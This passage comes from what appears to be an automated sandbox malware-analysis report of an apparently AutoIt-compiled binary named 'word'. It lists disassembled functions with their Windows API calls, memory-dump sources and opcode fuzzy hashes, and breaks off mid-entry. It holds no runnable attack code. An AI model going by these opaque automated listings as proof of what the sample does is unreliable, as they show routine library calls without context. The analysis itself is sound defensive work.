                                                                            • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                            • EndPath.GDI32(?), ref: 004472B0
                                                                            • StrokePath.GDI32(?), ref: 004472BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 2783949968-0
                                                                            • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                            • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                            • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                            • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                            Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 00417D1A
                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                            • __getptd.LIBCMT ref: 00417D31
                                                                            • __amsg_exit.LIBCMT ref: 00417D3F
                                                                            • __lock.LIBCMT ref: 00417D4F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                            • String ID:
                                                                            • API String ID: 3521780317-0
                                                                            • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                            • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                            • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                            • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                            Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00471144
                                                                            • GetDC.USER32(00000000), ref: 0047114D
                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                            • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                            • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                            • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                            Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00471102
                                                                            • GetDC.USER32(00000000), ref: 0047110B
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                            • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                            • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                            • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                            Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                            • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                            • GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                                                                            • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                            • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                            • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                            • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                            Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                            • CloseHandle.KERNEL32(?), ref: 004390EB
                                                                            • CloseHandle.KERNEL32 ref: 004390F0
                                                                              • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                              • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000), ref: 00438FC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                            • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                            • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                            • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                            Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                            • __getptd_noexit.LIBCMT ref: 00414080
                                                                            • __freeptd.LIBCMT ref: 0041408A
                                                                            • ExitThread.KERNEL32 ref: 00414093
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3182216644-0
                                                                            • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                            • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                            • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                            • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                            Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID: $8'I
                                                                            • API String ID: 2358735015-3608026889
                                                                            • Opcode ID: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
                                                                            • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                            • Opcode Fuzzy Hash: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
                                                                            • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                            Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3380330463-3941886329
                                                                            • Opcode ID: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                                                                            • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                            • Opcode Fuzzy Hash: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                                                                            • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                            Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HH$HH
                                                                            • API String ID: 0-1787419579
                                                                            • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                            • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                            Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 99cbe353e2901de66005753853838c613826515f51032c8bbd27fd43aed3c9d1
                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                            • Opcode Fuzzy Hash: 99cbe353e2901de66005753853838c613826515f51032c8bbd27fd43aed3c9d1
                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                            Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                            Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                            • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                            • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                            • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                            Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00474833
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                            • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                            • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                            • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                            Function 00448014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMenuPopup
                                                                            • String ID: X+
                                                                            • API String ID: 3826294624-1938338529
                                                                            • Opcode ID: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                            • Instruction ID: 7f91a4590d0182010b64de3f09e19208a551650f1ca78392937ca0f6ec2af794
                                                                            • Opcode Fuzzy Hash: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                            • Instruction Fuzzy Hash: CC21AC35600201CFE724CF28D084BABB3E1BBAA324F14841FE59887360CB7568CACB65
                                                                            Function 00469995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,00000114,00000000,?,?,?,?,?,004A83D8,?), ref: 00469A31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Proc
                                                                            • String ID: X+
                                                                            • API String ID: 2346855178-1938338529
                                                                            • Opcode ID: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                            • Instruction ID: 5414628f158ba78a046d4a24b655e4ccbf4c8d46c3d310d0e0a8d963d1b880b8
                                                                            • Opcode Fuzzy Hash: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                            • Instruction Fuzzy Hash: B4115932700150ABE610CA59EC44E7BB79DEBCA725F14815FF68093282DBB96C05D77B
                                                                            Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: htonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 3832099526-2422070025
                                                                            • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
